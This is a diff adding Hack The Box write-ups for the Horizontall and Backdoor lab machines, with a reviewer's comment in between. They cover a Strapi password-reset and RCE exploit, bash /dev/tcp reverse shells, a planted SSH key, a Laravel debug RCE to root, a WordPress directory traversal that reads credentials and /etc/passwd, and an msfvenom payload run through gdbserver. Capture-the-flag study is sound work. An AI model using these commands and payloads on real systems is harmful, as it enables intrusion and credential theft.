+ Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated) | multiple/webapps/50238.py
+ Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) | multiple/webapps/50239.py
+ Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit) | nodejs/webapps/50716.rb
+ ----------------------------------------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+
+Let's use the Unauthenticated exploit:
+
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → cp $(locate 50239.py) .
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → vim 50239.py
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → python3 50239.py http://api-prod.horizontall.htb/
+ [+] Checking Strapi CMS Version running
+ [+] Seems like the exploit will work!!!
+ [+] Executing exploit
+
+
+ [+] Password reset was successfully
+ [+] Your email is: admin@horizontall.htb
+ [+] Your new credentials are: admin:SuperStrongPassword1
+ [+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY4OTYyMjQ1LCJleHAiOjE2NzE1NTQyNDV9.9bnkS2ZxD8V5_RR-urF403xy8g-VVYaeukmKEBBGCK4
+
+
+ $>
+
+
+
+This exploit basically resets the **admin@horizontall.htb** user's password to **SuperStrongPassword1** so once we ran it we can login:
+
+
+
+but the more interesting part is that we can execute code:
+
+
+ $> bash
+ [+] Triggering Remote code executin
+ [*] Rember this is a blind RCE don't expect to see output
+ id
+
+
+However as you can see it is a blind RCE, we can't see any output, so to counter that we're going to get a reverse shell instead:
+
+
+ [term 1]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → nc -lvnp 9999
+
+ [term2]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → python3 50239.py http://api-prod.horizontall.htb/
+ [+] Checking Strapi CMS Version running
+ [+] Seems like the exploit will work!!!
+ [+] Executing exploit
+
+
+ [+] Password reset was successfully
+ [+] Your email is: admin@horizontall.htb
+ [+] Your new credentials are: admin:SuperStrongPassword1
+ [+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY4OTYyNDc3LCJleHAiOjE2NzE1NTQ0Nzd9.5lNGdTyiV9d-ciGggW5Z5Y6OJNZPARJAWBtM41qxW7A
+
+
+ $> bash -c 'bash -i >& /dev/tcp/10.10.16.14/9999 0>&1'
+ [+] Triggering Remote code executin
+ [*] Rember this is a blind RCE don't expect to see output
+
+ [term1]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → nc -lvnp 9999
+ Connection from 10.129.17.82:42004
+ bash: cannot set terminal process group (1975): Inappropriate ioctl for device
+ bash: no job control in this shell
+ strapi@horizontall:~/myapi$ id
+ id
+ uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
+ strapi@horizontall:~/myapi$
+
+
+
+Now that we got a reverse shell, let's upgrade it to a fully interactive tty:
+
+
+ strapi@horizontall:~/myapi$ which wget curl python python3
+ which wget curl python python3
+ /usr/bin/wget
+ /usr/bin/curl
+ /usr/bin/python
+ /usr/bin/python3
+
+ #spawn a TTY shell with python3:
+ strapi@horizontall:~/myapi$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+
+ #CTRL+Z to background the process
+ strapi@horizontall:~/myapi$ ^Z
+ [1] + 3112123 suspended nc -lvnp 9999
+
+ #stty raw it and then bring it back to the foreground:
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → stty raw -echo ; fg
+ [1] + 3112123 continued nc -lvnp 9999
+
+ #then set the TERM and SHELL env variables and the tty rows and colums:
+ strapi@horizontall:~/myapi$ export TERM=screen-256color
+ strapi@horizontall:~/myapi$ export SHELL=bash
+ strapi@horizontall:~/myapi$ stty rows 30 cols 200
+
+ #reset to refresh the terminal
+ strapi@horizontall:~/myapi$ reset
+
+
+
+Now that we have a fully interactive TTY reverse shell, we can go grab the user flag:
+
+
+ strapi@horizontall:~$ cd /home/
+ strapi@horizontall:/home$ ls
+ developer
+ strapi@horizontall:/home$ cd developer/
+ strapi@horizontall:/home/developer$ ls
+ composer-setup.php myproject user.txt
+ strapi@horizontall:/home/developer$ cat user.txt
+ fcXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now just like on the BountyHunter box, we use linpeas.sh to enumerate privesc paths:
+
+
+ [term1]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → cp ../BountyHunter/linpeas.sh .
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term2]
+ strapi@horizontall:/tmp$ wget http://10.10.16.14:9090/linpeas.sh
+
+ strapi@horizontall:/tmp$ chmod +x linpeas.sh
+ strapi@horizontall:/tmp$ ./linpeas.sh
+
+
+
+` 
+
+Now what's interesting here is the local port 8000:
+
+
+
+As it is written, it's a local port, so let's port forward it via SSH:
+
+
+ [term1]
+ strapi@horizontall:~$ mkdir .ssh
+ strapi@horizontall:~$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAfhgjcMFy5mO4fwhQyW6vdX5bgTzqZTh9MhCW7+k6Sj nothing@nowhere' > .ssh/authorized_keys
+
+ [term2]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → sshpub -L 8000:127.0.0.1:8000 strapi@horizontall.htb -i ~/.ssh/mainpc
+ Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Sun Nov 20 17:04:40 UTC 2022
+
+ System load: 0.0 Processes: 183
+ Usage of /: 82.1% of 4.85GB Users logged in: 0
+ Memory usage: 45% IP address for eth0: 10.129.17.82
+ Swap usage: 0%
+
+
+ 0 updates can be applied immediately.
+
+ Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
+
+
+ Last login: Sun Nov 20 17:01:35 2022 from 10.10.16.14
+ $
+
+ [term3]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → nmap -sCV 127.0.0.1 -p 8000
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 17:05 UTC
+ Nmap scan report for localhost (127.0.0.1)
+ Host is up (0.000048s latency).
+
+ PORT STATE SERVICE VERSION
+ 8000/tcp open http (PHP 7.4.22)
+ | fingerprint-strings:
+ | FourOhFourRequest:
+ | HTTP/1.0 404 Not Found
+ | Date: Sun, 20 Nov 2022 17:05:31 GMT
+ | Connection: close
+ | X-Powered-By: PHP/7.4.22
+ | Cache-Control: no-cache, private
+ | date: Sun, 20 Nov 2022 17:05:31 GMT
+ | Content-type: text/html; charset=UTF-8
+ | <****!DOCTYPE html>
+ | <****html lang="en">
+ | <****head>
+ | <****meta charset="utf-8">
+ | <****meta name="viewport" content="width=device-width, initial-scale=1">
+ | <****title>Not Found <****/title>
+ | <****!-- Fonts -->
+ | <****link rel="preconnect" href="https://fonts.gstatic.com">
+ | <****link href="https://fonts.googleapis.com/css2?family=Nunito &display;=swap" rel="stylesheet">
+ | <****style>
+ | normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-app
+ | GetRequest:
+ | HTTP/1.0 200 OK
+ | Date: Sun, 20 Nov 2022 17:05:26 GMT
+ | Connection: close
+ | X-Powered-By: PHP/7.4.22
+ | Content-Type: text/html; charset=UTF-8
+ | Cache-Control: private, must-revalidate
+ | Date: Sun, 20 Nov 2022 17:05:26 GMT
+ | pragma: no-cache
+ | expires: -1
+ | Set-Cookie: XSRF-TOKEN=eyJpdiI6InJ6Rjhhc0RMR3E0d242U0NrNzNzQ3c9PSIsInZhbHVlIjoiSWNaeGhCZitFTURXR2VlM005QmdsVm5BNFk2cThPN0g1OEJvTi9iUFYyNEpHQWJMZTJuTmtPVGZla3NwbFl5NkhNRHF4ajRBTFFoYzJaL2FCK2pocVkyMTIwVHBqeWRieU1zQWE4S095T1dOTG1rWkZURGF2RnVteTlmdTJ0S0MiLCJtYWMiOiIxZDM2ODdjZjExMmQxYzY4M2Y3ZjZiN2JlYjk2NzNkMWE0YTJkMGExOTkxZjAyZDE4ZDNjMzVjNmI3NTQ0NjdhIn0%3D; expires=Sun, 20-Nov-2022 19:05:26 GMT; Max-Age=7200; path=/; samesite=lax
+ |_ Set-Cookie: laravel_session=eyJpdiI6IkhtTlZjUnBzZ2RkSDNZMGNhNjA5bWc9PSIsInZhbHVlIjoiYXY0QlozV004N2pydDZ5MVJ2QnJ2RmRnZUYrWVdQR0l4VWVJWmhaMFdpSXFITDdrVnNzYzF4RGhFZlkxczlmSEtaQkFrUDlLcVVXQlBiOTh3U3FxclpoVGxpaDNZMzkvSXhreEZON3
+
+After port-forwarding the port 8000 we see it's a laravel webserver:
+
+
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://127.0.0.1:8000
+ ===============================================================
+ Gobuster v3.3
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://127.0.0.1:8000
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.3
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/11/20 17:12:29 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /profiles (Status: 500) [Size: 616204]
+
+
+
+gobuster found /profiles so let's investigate it:
+
+
+
+So we know that there's a laravel 8 website on port 8000, and where it is located on the machine thanks to the error we're seeing in /profiles, so let's look for exploits:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → while true ; do sshpub -L 8000:127.0.0.1:8000 strapi@horizontall.htb -i ~/.ssh/mainpc ; done
+
+ #since the ssh port forwarding keeps dying, run it like that ^
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → searchsploit laravel 8
+ ----------------------------------------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ ----------------------------------------------------------------------------------------- ---------------------------------
+ Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection | php/webapps/50538.txt
+ Laravel - 'Hash::make()' Password Truncation Security | multiple/remote/39318.txt
+ **Laravel 8.4.2 debug mode - Remote code execution | php/webapps/49424.py**
+ Laravel Log Viewer <****0.13.0 - Local File Download | php/webapps/44343.py
+ Laravel Nova 3.7.0 - 'range' DoS | php/webapps/49198.txt
+ PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF) | php/webapps/50525.txt
+ PHP Laravel Framework 5.5.40 / 5.6.x <****5.6.30 - token Unserialize Remote Command Executi | linux/remote/47129.rb
+ UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read | php/webapps/48166.txt
+ UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload | php/webapps/46389.py
+ ----------------------------------------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+Let's take a look at the RCE one:
+
+
+ [term1]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → python 49424.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log 'bash -c "(bash -i &>/dev/tcp/10.10.16.14/4444 0>&1)&"'
+
+ Exploit...
+
+ [term2]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → nc -lvnp 4444
+
+ Connection from 10.129.17.82:33968
+ bash: cannot set terminal process group (27737): Inappropriate ioctl for device
+ bash: no job control in this shell
+ root@horizontall:/home/developer/myproject/public#
+ root@horizontall:/home/developer/myproject/public# id
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@horizontall:/home/developer/myproject/public# cd
+ cd
+ root@horizontall:~# cat root.txt
+ cat root.txt
+ bdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
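Review bot: the hunk never states why the Laravel exploit yields root. The shell after 49424.py comes back as `root@horizontall:/home/developer/myproject/public#` with `uid=0(root)`, so the actual privesc finding is that a developer's Laravel app in debug mode is being served on 127.0.0.1:8000 as root, and the debug-mode RCE simply inherits that; one sentence before "Let's take a look at the RCE one" should say so. In the same place, say that the second argument (`/home/developer/myproject/storage/logs/laravel.log`) is the log path the script requires and that it was read off the error page at /profiles (the `/profiles (Status: 500) [Size: 616204]` hit), i.e. the debug page is itself the information leak that makes the exploit usable. On the Strapi side, "This exploit basically resets the admin@horizontall.htb user's password" should carry a caveat: the script overwrites the real admin's password with `SuperStrongPassword1` before chaining into the authenticated RCE (the searchsploit listing shows these as separate "Set Password (Unauthenticated)" and "RCE (Authenticated)" entries), which is destructive on anything other than a lab box. Smaller items: `sshpub` is used but never defined; the `while true ; do sshpub -L 8000:127.0.0.1:8000 ... ; done` workaround for a forward that "keeps dying" is better written as a forward-only session (`-N`) with `ServerAliveInterval` set, since the loop re-prompts and re-logs in every time the remote shell exits; and the key written into `~strapi/.ssh/authorized_keys` is persistence left on the target, worth a reminder to remove it.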
diff --git a/Easy/69.md b/Easy/69.md
new file mode 100644
index 0000000..58e5935
--- /dev/null
+++ b/Easy/69.md
@@ -0,0 +1,435 @@
+# Backdoor Writeup
+
+
+
+## Introduction :
+
+Backdoor is an easy Linux box released back in November 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → nmap -sCV backdoor.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 20:11 UTC
+ Nmap scan report for backdoor.htb (10.129.96.68)
+ Host is up (0.068s latency).
+ Not shown: 998 closed tcp ports (conn-refused)
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
+ | 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
+ |_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
+ 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ |_http-title: Backdoor - Real-Life
+ |_http-generator: WordPress 5.8.1
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://backdoor.htb
+ ===============================================================
+ Gobuster v3.3
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://backdoor.htb
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.3
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/11/20 20:12:34 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /wp-content (Status: 301) [Size: 317] [--> http://backdoor.htb/wp-content/]
+ /wp-includes (Status: 301) [Size: 318] [--> http://backdoor.htb/wp-includes/]
+ /wp-admin (Status: 301) [Size: 315] [--> http://backdoor.htb/wp-admin/]
+ Progress: 50259 / 220561 (22.79%)^C
+ [!] Keyboard interrupt detected, terminating.
+ ===============================================================
+ 2022/11/20 20:13:26 Finished
+ ===============================================================
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://backdoor.htb/wp-content/
+ ===============================================================
+ Gobuster v3.3
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://backdoor.htb/wp-content/
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.3
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/11/20 20:13:30 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /themes (Status: 301) [Size: 324] [--> http://backdoor.htb/wp-content/themes/]
+ /uploads (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/uploads/]
+ /plugins (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/plugins/]
+ /upgrade (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/upgrade/]
+ Progress: 3928 / 220561 (1.78%)^C
+ [!] Keyboard interrupt detected, terminating.
+ ===============================================================
+ 2022/11/20 20:13:33 Finished
+ ===============================================================
+
+
+
+` 
+
+So thanks to Gobuster we found the /wp-content/plugins/ebook-download/ subdirectory:
+
+
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → searchsploit ebook plugin
+ ----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ ----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
+ Facebook Profile MyBB Plugin 2.4 - Persistent Cross-Site Scripting | php/webapps/23355.txt
+ WordPress Plugin eBook Download 1.1 - Directory Traversal | php/webapps/39575.txt
+ WordPress Plugin Facebook Opengraph Meta 1.0 - SQL Injection | php/webapps/17773.txt
+ WordPress Plugin Facebook Promotions 1.3.3 - SQL Injection | php/webapps/17737.txt
+ WordPress Plugin Facebook Survey 1.0 - SQL Injection | php/webapps/22853.txt
+ WordPress Plugin flash-album-gallery - 'facebook.php' Cross-Site Scripting | php/webapps/36383.txt
+ WordPress Plugin Nextend Facebook Connect 1.4.59 - Cross-Site Scripting | php/webapps/35439.txt
+ WordPress Plugin Spider Facebook - 'facebook.php' SQL Injection | php/webapps/39300.txt
+ ----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → cat $(locate 39575.txt)
+ # Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
+ # Exploit Author: Wadeek
+ # Website Author: https://github.com/Wad-Deek
+ # Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
+ # Version: 1.1
+ # Tested on: Xampp on Windows7
+
+ [Version Disclosure]
+ ======================================
+ http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
+ ======================================
+
+ [PoC]
+ ======================================
+ /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
+ ======================================%
+
+
+
+Apparently there is a Directory traversal vulnerability, so let's test it out:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → wget http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php\?ebookdownloadurl\=../../../wp-config.php -O wp-config.php
+ --2022-11-20 20:35:12-- http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
+ Resolving backdoor.htb (backdoor.htb)... 10.129.96.68
+ Connecting to backdoor.htb (backdoor.htb)|10.129.96.68|:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 3866 (3.8K) [application/octet-stream]
+ Saving to: ‘wp-config.php’
+
+ wp-config.php 100%[=========================================================================================================>] 3.78K --.-KB/s in 0.03s
+
+ 2022-11-20 20:35:12 (126 KB/s) - ‘wp-config.php’ saved [3866/3866]
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → cat wp-config.php
+ ../../../wp-config.php../../../wp-config.php../../../wp-config.php<****?php
+ /**
+ * The base configuration for WordPress
+ *
+ * The wp-config.php creation script uses this file during the installation.
+ * You don't have to use the web site, you can copy this file to "wp-config.php"
+ * and fill in the values.
+ *
+ * This file contains the following configurations:
+ *
+ * * MySQL settings
+ * * Secret keys
+ * * Database table prefix
+ * * ABSPATH
+ *
+ * @link https://wordpress.org/support/article/editing-wp-config-php/
+ *
+ * @package WordPress
+ */
+
+ // ** MySQL settings - You can get this info from your web host ** //
+ /** The name of the database for WordPress */
+ define( 'DB_NAME', 'wordpress' );
+
+ /** MySQL database username */
+ define( 'DB_USER', 'wordpressuser' );
+
+ /** MySQL database password */
+ define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );
+
+ [...]
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php\?ebookdownloadurl\=../../../../../../etc/passwd
+ ../../../../../../etc/passwd../../../../../../etc/passwd../../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ sys:x:3:3:sys:/dev:/usr/sbin/nologin
+ sync:x:4:65534:sync:/bin:/bin/sync
+ games:x:5:60:games:/usr/games:/usr/sbin/nologin
+ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+ systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+ systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+ messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
+ syslog:x:104:110::/home/syslog:/usr/sbin/nologin
+ _apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+ tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
+ uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
+ tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
+ landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
+ pollinate:x:110:1::/var/cache/pollinate:/bin/false
+ usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+ sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
+ systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
+ user:x:1000:1000:user:/home/user:/bin/bash
+ lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
+ mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
+
+So here we have credentials: **wordpressuser:MQYBJSaD#DxG6qbm** and we also have the list of users with the passwd file.
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → for i in `seq 620 1000`; do curl --output - http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php\?ebookdownloadurl\=/proc/$i/cmdline ; echo ; done
+
+
+
+Let it run, and eventually you'll find the gdbserver process running on port 1337:
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/13 ] [~]
+ → nmap -sCV backdoor.htb -p1337
+ Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-30 09:41 CET
+ Nmap scan report for backdoor.htb (10.129.96.68)
+ Host is up (0.094s latency).
+
+ PORT STATE SERVICE VERSION
+ 1337/tcp open waste?
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 107.13 seconds
+
+
+
+So to exploit gdbserver, we follow this page on [hacktricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-remote-gdbserver):
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/13 ] [~]
+ → msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.37 LPORT=8001 PrependFork=true -f elf -o rev.elf
+ [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
+ [-] No arch selected, selecting arch: x64 from the payload
+ No encoder specified, outputting raw payload
+ Payload size: 106 bytes
+ Final size of elf file: 226 bytes
+ Saved as: rev.elf
+
+
+
+Then locally, we debug it:
+
+
+ [term1]
+ [ 10.10.14.37/23 ] [ /dev/pts/16 ] [~]
+ → nc -lvnp 8001
+ listening on [any] 8001 ...
+
+ [term2]
+ [ 10.10.14.37/23 ] [ /dev/pts/13 ] [~]
+ → gdb -q rev.elf
+ Reading symbols from rev.elf...
+ (No debugging symbols found in rev.elf)
+ (gdb) target extended-remote 10.129.96.68
+ 10.129.96.68: No such file or directory.
+ (gdb) **target extended-remote 10.129.96.68:1337**
+ Remote debugging using 10.129.96.68:1337
+ Reading /lib64/ld-linux-x86-64.so.2 from remote target...
+ warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
+ Reading /lib64/ld-linux-x86-64.so.2 from remote target...
+ Reading symbols from target:/lib64/ld-linux-x86-64.so.2...
+ Reading /usr/lib/debug/.build-id/53/74b5558386b815e69cc1838a6052cc9b4746f3.debug from remote target...
+ Reading /lib64/ld-2.31.so from remote target...
+ Reading /lib64/.debug/ld-2.31.so from remote target...
+ Reading /usr/lib/debug//lib64/ld-2.31.so from remote target...
+ Reading /usr/lib/debug/lib64//ld-2.31.so from remote target...
+ Reading target:/usr/lib/debug/lib64//ld-2.31.so from remote target...
+ (No debugging symbols found in target:/lib64/ld-linux-x86-64.so.2)
+ Reading /usr/lib/debug/.build-id/42/86d016f71e32db3a4f7221c847c3d1e13d6bd4.debug from remote target...
+ 0x00007ffff7fd0100 in ?? () from target:/lib64/ld-linux-x86-64.so.2
+
+ (gdb) **remote put rev.elf /dev/shm/nihilist**
+ Successfully sent file "rev.elf".
+
+ (gdb) **run**
+ The program being debugged has been started already.
+ Start it from the beginning? (y or n) y
+ Starting program:
+ Reading /dev/shm/nihilist from remote target...
+ Reading /dev/shm/nihilist from remote target...
+ Reading symbols from target:/dev/shm/nihilist...
+ (No debugging symbols found in target:/dev/shm/nihilist)
+ Reading /usr/lib/debug/.build-id/42/86d016f71e32db3a4f7221c847c3d1e13d6bd4.debug from remote target...
+ [Detaching after fork from child process 7213]
+ [Inferior 1 (process 7204) exited normally]
+ (gdb)
+
+ [term1]
+ [ 10.10.14.37/23 ] [ /dev/pts/16 ] [~]
+ → nc -lvnp 8001
+ listening on [any] 8001 ...
+ connect to [10.10.14.37] from (UNKNOWN) [10.129.96.68] 49544
+ id
+ uid=1000(user) gid=1000(user) groups=1000(user)
+
+
+
+And we got the reverse shell! Now let's upgrade it to a fully interactive TTY:
+
+
+ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ user@Backdoor:/home/user$ ^Z
+ [1] + 216968 suspended nc -lvnp 8001
+
+ [ 10.10.14.37/23 ] [ /dev/pts/16 ] [~]
+ → stty raw -echo ; fg
+ [1] + 216968 continued nc -lvnp 8001
+ export TERM=screen-256color
+ user@Backdoor:/home/user$ export SHELL=bash
+ user@Backdoor:/home/user$ stty rows 50 cols 200
+ user@Backdoor:/home/user$ reset
+
+
+
+Now that we have a fully interactive reverse shell, let's print the user flag:
+
+
+ user@Backdoor:/home/user$ cat user.txt
+ 3fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to enumerate privesc paths, we run linpeas.sh :
+
+
+ [term1]
+ [ 10.10.14.37/23 ] [ /dev/pts/15 ] [~/HTB/Backdoor]
+ → ls
+ linpeas.sh
+
+ [ 10.10.14.37/23 ] [ /dev/pts/15 ] [~/HTB/Backdoor]
